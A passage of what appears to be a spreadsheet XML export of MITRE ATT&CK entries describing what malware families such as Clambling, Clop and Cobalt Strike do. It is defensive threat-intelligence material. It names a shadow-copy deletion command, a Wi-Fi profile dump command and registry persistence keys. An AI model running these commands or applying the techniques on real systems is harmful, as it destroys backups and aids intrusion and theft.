    <t>[CharmPower](https://attack.mitre.org/software/S0674) can change its C2 channel once every 360 loops by retrieving a new domain from the actors’ S3 bucket.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can delete created files from a compromised system.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can enumerate drives and list the contents of the C: drive on a victim's computer.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to download additional modules to a compromised host.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can remove persistence-related artifacts from the Registry.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use PowerShell for payload execution and C2 communication.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to list running processes through the use of `tasklist`.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to enumerate `Uninstall` registry values.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to capture screenshots.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can list the installed applications on a compromised host.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can send additional modules over C2 encoded with base64.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can send additional modules over C2 encrypted with a simple substitution cipher.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can enumerate the OS version and computer name on a targeted system.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to use &lt;code&gt;ipconfig&lt;/code&gt; to enumerate system network settings.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use `netsh wlan show profiles` to list specific Wi-Fi profile details.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use HTTP to communicate with C2.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can download additional modules from actor-controlled Amazon S3 buckets.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>The C# implementation of  the [CharmPower](https://attack.mitre.org/software/S0674) command execution module can use &lt;code&gt;cmd&lt;/code&gt;.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use `wmic` to gather information from a system.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>Some variants of [Cherry Picker](https://attack.mitre.org/software/S0107) use AppInit_DLLs to achieve persistence by creating the following Registry key: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "AppInit_DLLs"="pserver32.dll"&lt;/code&gt;(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) exfiltrates files over FTP.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>Recent versions of [Cherry Picker](https://attack.mitre.org/software/S0107) delete files and registry keys created by the malware.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can upload local files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can list directory contents.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can download remote files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can spider authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can perform brute force password guessing against authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s client component is packed with UPX.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can change the timestamp of files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is a Web Shell payload.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is capable of opening a command terminal.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) can use a digitally signed binary ("Logitech Bluetooth Wizard Host Process") to load its dll into memory.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>The [Chinoxy](https://attack.mitre.org/software/S1041) dropping function can initiate decryption of its config file.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) has used the name `eoffice.exe` in attempt to appear as a legitimate file.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) has encrypted its configuration file.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) has established persistence via the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key and by loading a dropper to `(%COMMON_ STARTUP%\\eoffice.exe)`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can encrypt and store on disk collected data before exfiltration.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can collect data from a local system.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can decrypt its encrypted internal code.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can exfiltrate collected data via C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can download its code from C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can store captured system information locally prior to exfiltration.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can use Windows API including `WinExec` for execution.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can encrypt sections of its code to evade detection.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can set itself to sleep before requesting a new command from C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) has the ability to capture screenshots.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) has the ability to list drives and obtain the computer name of a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can enumerate the IP address of a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can retrieve the username from a targeted system.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to use Telnet for communication.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can use Dropbox to download malicious payloads, send commands, and receive information.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to bypass UAC using a `passuac.dll` file.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to capture and store clipboard data.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can collect information from a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can deobfuscate its payload prior to execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can send files from a victim's machine to Dropbox.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can browse directories on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to set its file attributes to hidden.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can capture keystrokes on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has gained execution through luring victims into opening malicious files.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can set and delete Registry keys.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to enumerate network shares.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to use TCP and UDP for communication.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>The [Clambling](https://attack.mitre.org/software/S0660) executable has been obfuscated when dropped on a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>The [Clambling](https://attack.mitre.org/software/S0660) dropper can use PowerShell to download the malware.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can enumerate processes on a targeted system.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can execute binaries through process hollowing.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can inject into the `svchost.exe` process for execution.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to enumerate Registry keys, including &lt;code&gt;KEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir&lt;/code&gt; to search for a bitcoin wallet.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can establish persistence by adding a Registry run key.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to capture screenshots.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can create and start services on a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has been delivered to victim's machines through malicious e-mail attachments.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can discover the hostname, computer name, and Windows version of a targeted machine.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can enumerate the IP address of a compromised machine.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can identify the username on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can determine the current time.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can wait 30 minutes before initiating contact with C2.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can record screen content in AVI format.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to communicate over HTTP.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can use cmd.exe for command execution.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can register itself as a system service to gain persistence.(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can use code signing to evade detection.(Citation: Unit42 Clop April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can encrypt files using AES, RSA, and RC4 and will add the ".clop" extension to encrypted files.(Citation: Mcafee Clop Aug 2019)(Citation: Unit42 Clop April 2021)(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has used a simple XOR operation to decrypt strings.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can uninstall or disable security products.(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has searched folders and subfolders for files to encrypt.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can delete the shadow volumes with &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; and can use bcdedit to disable recovery options.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can make modifications to Registry keys.(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can use msiexec.exe to disable security tools on the system.(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc().(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can enumerate network shares.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can enumerate all processes on the victim's machine.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can search for processes with antivirus and antimalware product names.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can kill several processes and services related to backups and security solutions.(Citation: Unit42 Clop April 2021)(Citation: Mcafee Clop Aug 2019) </t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has been packed to help avoid detection.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the &lt;code&gt;GetTextCharset&lt;/code&gt; function.(Citation: Mcafee Clop Aug 2019) </t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has used the &lt;code&gt;sleep&lt;/code&gt; command to avoid sandbox detection.(Citation: Unit42 Clop April 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can use cmd.exe to help execute commands on the system.(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can download a hosted "beacon" payload using [BITSAdmin](https://attack.mitre.org/software/S0190).(Citation: CobaltStrike Scripted Web Delivery)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a number of known techniques to bypass Windows UAC.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)	</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) will break large data sets into smaller chunks for exfiltration.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can collect data from a local system.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver Beacon payloads for lateral movement by leveraging remote COM execution.(Citation: Cobalt Strike DCOM Jan 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine if the user on an infected machine is in the admin or domain admin group.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a domain user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to accept a value for HTTP Host Header to enable domain fronting.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can identify targets by querying account groups on a domain contoller.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to load DLLs via reflective injection.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit vulnerabilities such as MS14-058.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can explore files on a compromised system.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) includes a capability to modify the Beacon payload to eliminate known signatures or unpacking methods.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver additional payloads to victim machines.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can use JavaScript to perform reconnaissance actions.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can track key presses with a keylogger module.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn a job to inject into LSASS memory and dump password hashes.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a local user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;net localgroup&lt;/code&gt; to list local groups on a system.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can make tokens from known credentials.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can modify Registry values within &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt; to enable the execution of additional code.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload is capable of running shell commands without &lt;code&gt;cmd.exe&lt;/code&gt; and PowerShell commands without &lt;code&gt;powershell.exe&lt;/code&gt;(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform port scans from an infected host.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query shared drives on the local system.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to use TCP, ICMP, and UDP for C2 communications.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn processes with alternate PPIDs.(Citation: CobaltStrike Daddy May 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform pass the hash.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)(Citation: Cyberreason Anchor December 2019) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use spoof arguments in spawned processes that execute beacon commands.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload can collect information on process details.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use process hollowing for execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can inject a variety of payloads into processes dynamically chosen by the adversary.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Python to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
